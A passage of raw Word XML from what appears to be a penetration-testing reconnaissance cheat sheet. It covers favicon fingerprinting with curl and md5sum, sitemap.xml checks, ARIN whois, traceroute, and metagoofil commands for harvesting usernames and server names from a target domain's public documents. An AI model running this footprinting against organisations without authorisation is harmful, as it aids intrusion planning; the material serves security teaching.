            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="38092728" w14:textId="380AC016" w:rsidR="00B268A2" w:rsidRDefault="00B268A2" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>17.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="749F0F7A" w14:textId="40A5B4D8" w:rsidR="00BC7F5F" w:rsidRDefault="00B268A2" w:rsidP="00BC7F5F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Favicon Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="522FFD4D" w14:textId="58A15779" w:rsidR="00BC7F5F" w:rsidRPr="00BC7F5F" w:rsidRDefault="00BC7F5F" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC7F5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Knowing about the framework used can provide more information)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E0F2DF8" w14:textId="52310BB6" w:rsidR="008C2907" w:rsidRDefault="00B268A2" w:rsidP="00FC5A3D">
            <w:r>
              <w:t xml:space="preserve">The small icon in the tab of a web browser shows us potentially what </w:t>
            </w:r>
            <w:r w:rsidR="008C2907">
              <w:t>framework was used to create the web site. This happens if the developers forgot to change it to a custom favicon. Run this command on the favicon URL location (found by viewing the page source and looking for the link in the HTML):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0493BC61" w14:textId="77777777" w:rsidR="008C2907" w:rsidRDefault="008C2907" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008C2907">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">curl </w:t>
            </w:r>
            <w:r w:rsidRPr="008C2907">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">https://TARGET.FAVICON.ICON.LOCATION </w:t>
            </w:r>
            <w:r w:rsidRPr="008C2907">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidRPr="008C2907">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008C2907">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>md5sum</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16154FA9" w14:textId="5B986538" w:rsidR="00BC7F5F" w:rsidRDefault="00BC7F5F" w:rsidP="00FC5A3D">
            <w:r w:rsidRPr="00BC7F5F">
              <w:t>This will give the md5 hash of the image file.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Then use this to compare against known favicons at: </w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidRPr="00926A8F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://wiki.owasp.org/index.php/OWASP_favicon_database</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00536A2C" w14:paraId="26F03CDA" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7DCDA100" w14:textId="489B36C9" w:rsidR="00536A2C" w:rsidRDefault="00536A2C" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>17.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="54A67628" w14:textId="357210D1" w:rsidR="00536A2C" w:rsidRDefault="00536A2C" w:rsidP="00BC7F5F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Sitemap.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="110FD1CC" w14:textId="74F938AB" w:rsidR="00536A2C" w:rsidRDefault="00536A2C" w:rsidP="00FC5A3D">
            <w:r>
              <w:t xml:space="preserve">This file contains pages the website owner wants internet search engines to document, similarly to robots.txt but that is used more for pages that the owner wishes </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>remain</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> off of internet search engines. Simply check to see if sitemap.xml is a page on a site.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049571F" w14:paraId="5E6378B9" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="62E77AFF" w14:textId="2D844EBF" w:rsidR="0049571F" w:rsidRDefault="0049571F" w:rsidP="00FC5A3D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="65667C79" w14:textId="77777777" w:rsidR="0049571F" w:rsidRDefault="0049571F" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27C2271E" w14:textId="77777777" w:rsidR="0049571F" w:rsidRDefault="0049571F" w:rsidP="00FC5A3D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="291B2E58" w14:textId="70730BE4" w:rsidR="00335E53" w:rsidRDefault="00335E53" w:rsidP="0049571F"/>
    <w:p w14:paraId="089C2BC2" w14:textId="77777777" w:rsidR="00335E53" w:rsidRDefault="00335E53">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="442AEFB9" w14:textId="2295081D" w:rsidR="00335E53" w:rsidRDefault="00335E53" w:rsidP="00335E53">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Footprinting:</w:t>
      </w:r>
      <w:r w:rsidR="00D21B87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Locating</w:t>
      </w:r>
      <w:r w:rsidR="00816C1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> The Network Range</w:t>
      </w:r>
      <w:r w:rsidR="00FC776C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Metagoofil</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1054"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2390"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00335E53" w14:paraId="0138E7A0" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3E3B6B24" w14:textId="5AFFF41B" w:rsidR="00335E53" w:rsidRDefault="00335E53" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F8139C">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="088A233E" w14:textId="3042D523" w:rsidR="00335E53" w:rsidRDefault="00816C1A" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ARIN</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00816C1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(arin.net)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3676A8DD" w14:textId="4FFCA7E2" w:rsidR="00816C1A" w:rsidRPr="000079AE" w:rsidRDefault="00816C1A" w:rsidP="00816C1A">
            <w:r w:rsidRPr="00816C1A">
              <w:t>Network range information assists in creating a map of the target network. Using the network range, you can gather information about how the network is structured and which machines in the networks are alive. Further, it also helps to identify the network topology and access the control device and operating system used in the target network.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARIN is a Whois database search tool. Visit:  </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.arin.net/about/welcome/region</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00614155" w14:paraId="6DF3981A" w14:textId="77777777" w:rsidTr="00614155">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="66597E36" w14:textId="2EED378B" w:rsidR="00614155" w:rsidRDefault="00614155" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>18.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="124BC6F8" w14:textId="28E1C8D3" w:rsidR="00614155" w:rsidRDefault="00614155" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>traceroute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="001CDA69" w14:textId="7BB21F4F" w:rsidR="00614155" w:rsidRPr="00816C1A" w:rsidRDefault="00614155" w:rsidP="00614155">
            <w:r>
              <w:t>Traceroute tracks the route packets taken from an IP network on their way to a given host. It utilizes the IP protocol's time to live (TTL) field and attempts to elicit an ICMP  TIME_EXCEEDED response from each gateway along the path to the host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC776C" w14:paraId="6BD6A8ED" w14:textId="77777777" w:rsidTr="00AD47AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="00DCA877" w14:textId="12634887" w:rsidR="00FC776C" w:rsidRDefault="00FC776C" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>18.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2C379534" w14:textId="67686C8B" w:rsidR="00FC776C" w:rsidRDefault="00FC776C" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>metagoofil</w:t>
            </w:r>
            <w:r w:rsidR="00AD47AA">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00AD47AA" w:rsidRPr="00AD47AA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(metagoofil is not installed on Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E1C05E7" w14:textId="1CFE798B" w:rsidR="00AD47AA" w:rsidRDefault="00AD47AA" w:rsidP="00AD47AA">
            <w:r>
              <w:t xml:space="preserve">Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf, doc, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, ppt, docx, pptx, xlsx) belonging to a target company.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F15C7F" w14:textId="041B332E" w:rsidR="00AD47AA" w:rsidRDefault="00AD47AA" w:rsidP="00AD47AA">
            <w:r>
              <w:t xml:space="preserve">Metagoofil will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Hachoir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, PdfMiner? and others. With the results it will generate a report with usernames, software versions and servers or machine names that will help Penetration testers in the information gathering phase.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B63B9AA" w14:textId="768705AB" w:rsidR="00AD47AA" w:rsidRDefault="00AD47AA" w:rsidP="00614155">
            <w:r>
              <w:t>To install, simply use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>metagoofil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD47AA" w14:paraId="30DADE5E" w14:textId="77777777" w:rsidTr="00AD47AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="14515CFE" w14:textId="562E0BCA" w:rsidR="00AD47AA" w:rsidRDefault="00AD47AA" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>18.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="10693C44" w14:textId="1C9A309D" w:rsidR="00AD47AA" w:rsidRDefault="00AD47AA" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>metagoofil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3039B4D3" w14:textId="0EBDDF54" w:rsidR="00560806" w:rsidRPr="00560806" w:rsidRDefault="00AD47AA" w:rsidP="00560806">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To use the tool, here is an example. To s</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t>can for documents from a domain (</w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-d </w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>kali.org</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t>) that are PDF files (</w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-t </w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>pdf</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t>),</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:t xml:space="preserve"> limiting to find</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t xml:space="preserve"> 100 results (</w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t xml:space="preserve">), download </w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:t xml:space="preserve">no more </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t>25 files (</w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-n </w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t xml:space="preserve">), saving the downloads to a directory (-o </w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>kalipdf</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t>), and saving the output to a file (</w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>kalipdf.html</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:t xml:space="preserve"> use</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD47AA">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>metagoofil</w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -d </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">kali.org </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-t </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>pdf</w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-n </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-o </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>kalipdf</w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>kalipdf.html</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -d </w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:t>Domain to search</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-t</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
